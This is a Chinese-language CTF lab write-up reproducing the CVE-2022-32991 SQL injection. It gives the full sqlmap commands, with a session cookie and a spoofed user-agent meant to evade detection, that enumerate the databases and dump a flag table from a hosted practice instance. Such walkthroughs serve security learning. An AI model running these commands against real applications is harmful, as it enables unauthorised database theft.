CVE-2022-32991漏洞复现
CVE-2022-32991漏洞复现
题目提示

首先先注册一下,再到登录进去。


进行之后随机点击一个进行抓包。

现在有五个测试点,逐个测试。在一个测试点后面加上单引号。

在eid注入点的时候出现这个响应,所以这个应该是注入点。
这里的话直接使用sqlmap工具进行攻击。这个的话要绕过登录和对sqlmap攻击的检测,所以这里需要使用到cookie和UA头。
cookie=“PHPSESSID=moi3cr2adh2hul2uvm0iurppel”
user-agen="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
爆出数据库
-dbs 列出全部数据库
-batch 选择全部是yes
-u 指定URL
sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -dbs

发现一个库叫ctf,猜测flag应该在这里面。
爆数据表
-D 指定数据库
--tables 列出数据表
sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf --tables

数据表里面有个flag,
爆字段
-T 指定数据表
--columns 列出字段
sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf -T flag --columns

爆数据;
--dump 爆出数据
sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf -T flag --columns --dump

OK,拿到flag。

浙公网安备 33010602011771号